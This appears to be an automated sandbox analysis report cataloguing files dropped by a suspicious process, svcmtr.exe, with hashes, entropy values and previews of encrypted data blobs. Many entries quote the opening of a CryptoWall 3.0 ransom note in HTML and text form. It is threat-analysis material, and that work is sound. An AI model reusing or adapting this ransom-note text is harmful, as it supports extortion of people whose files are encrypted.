                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........8R...O$.....;C..2=a.n...HT......9E?..]..^.-.3....bT.(.E....ma.[.....+..)[8.K.Ej8.3..Dm.~u.B.2....._K....v.g8Jc,...03..M.<..9...}.U..P.L-....s.m...X.J..iB..N..1.p.j?j..J&R....sdx..c7.Buyz74...h...m......P..X.!.7......q...0.!.D..i..=d.#..U.P&...w.8q.i.kn..$FjU...H%...X..'..,w..=..*=..I.H.K:.\.1.8..v....,.....9.9.|BV{..%c<OM......o..r.6...~..))<x!....*(,vp.Oy..J.(...)~..%.........Gq..p..l_*......&^G".....M0.../O...o... ta.O6..p...... .......+.1..D...V....).p..q..".e&.....n{.b.o..GQ.0s..T..Xxp.f...L.f."[w....... g...Z..W..[.z.:=,....g..o..~w...}.3..f.h..]t@..w3t..2.y.
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4398
                                                                                                                          Entropy (8bit):7.926260837758786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDg9157kH+pA99/nJM2Ti5nBXXkCABtgT:GokC+p4/JkXnkCrT
                                                                                                                          MD5:12A5C7F9C2A4F24C1203411ACE7E495F
                                                                                                                          SHA1:E3E0C7E4441BF4B7978063B2ABFD183D8A8F712D
                                                                                                                          SHA-256:06D7AA81C086C43DC11B8F84E3217A874250CC61851E2897D81C02C7723B2384
                                                                                                                          SHA-512:D8EF697DD2BA2E460F08241EC24B59CA05E5472D21628C7C6EC8085C39162EF72B3987B59E644AB64C1A994F163C83BA0D8F936A3F14BB6C40FF20B7F65076E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..,`.'x.G.....N.......R^.?-#z.1p.....i/....0H.+..a.....~>d.g.Rlx.J3....ne.AD.O..Q..L.!....B...b...k."p....O.l*.....:2.8...O../.``.y.....P9.........CU.....4...Z.Swm.o . ......c.w..>..h.........o..[.1......fh.J|c....R...^.:......'z...$....H....P...{....KG.....B.t..QS...N,Z....._....E.<Q>3.Z.+.e..]%e!O.$....d2.....!...&..dv.G06.Da"2.(.....p...Dd..4..7l..rf.N.N.......U... .Rw..aYR\.>N.I.V...8]...,w.........+>*kbZb.%.<1=.bz..H.vn.<.P.M.....a..c..._....:jg.j....O.IM'x2...?.~.e..Z.[...$.*aZ...3.....l_...k....Y...o^..y.1..z.s...w..s.....k.Ld....%N..?.VM.9.{O.F.Rb...&W.m'
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6702
                                                                                                                          Entropy (8bit):7.96132324157974
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GonF5Ii3+fSWybKNzVOSRG3iVukay2HLJ:GK5IIm1VO4oTkdUN
                                                                                                                          MD5:B6E4228E833128A10ADDEE0B2B96402C
                                                                                                                          SHA1:BA7635203D0FBCACF76E44C6C03B59279F24820D
                                                                                                                          SHA-256:9109DA08798C6704BB63FCF3C5EF380FA496D147FE6315B4E6AC277AA557AF71
                                                                                                                          SHA-512:0B2FF4EF53079DD0CAA6D109A38A793CCA2F5AF326F0F558A665219A4CF1D17AD161FEA361DDBE4BF23B942FD718F2F2B0B6D35DA78D2B3E609E5F1269808F66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Ao.)y....O.........)'..Y....b._qQ@.........!G.M. h.b.'v..W.F..$.7........hi|.F..'...@>h)..G..u..P?.vX.".....{.....`.......q.Z5.3.g.....A..%..N..).........I..o^..e.J|5..S....o(......z.9..0..(0.&AF...=h.tKV.j....Z......k.m..f......L.e0.0..#`k..../.......S.....6.dR.r....'B.P.3....-..fD.#<..M9.)...Y.....$.xg...f.........F33.x...Z....g..a..;...O..........^I......1..cd..V...3....DMW.+.r...g.".yv..f......PCk...>..[....f....-6$.QT..2)....6.=..f(M.L..m.^.J.k.\C..?..<...UL.xI..<..gb..W'gZ.W..2..J....3......$N]<....?~..9f.]..$.......w.ja-..hf.h......Y.p...._:".1.`WQ7.
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6702
                                                                                                                          Entropy (8bit):7.96132324157974
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GonF5Ii3+fSWybKNzVOSRG3iVukay2HLJ:GK5IIm1VO4oTkdUN
                                                                                                                          MD5:B6E4228E833128A10ADDEE0B2B96402C
                                                                                                                          SHA1:BA7635203D0FBCACF76E44C6C03B59279F24820D
                                                                                                                          SHA-256:9109DA08798C6704BB63FCF3C5EF380FA496D147FE6315B4E6AC277AA557AF71
                                                                                                                          SHA-512:0B2FF4EF53079DD0CAA6D109A38A793CCA2F5AF326F0F558A665219A4CF1D17AD161FEA361DDBE4BF23B942FD718F2F2B0B6D35DA78D2B3E609E5F1269808F66
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):202254
                                                                                                                          Entropy (8bit):7.9990215591203775
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:oCmUOmqEJHzNto4A4JrQpDjMW9BHln8azhxAd:3l9xzk4ArDDxR3hU
                                                                                                                          MD5:6EFE5544CF3FC43182281D4BF8DD2C07
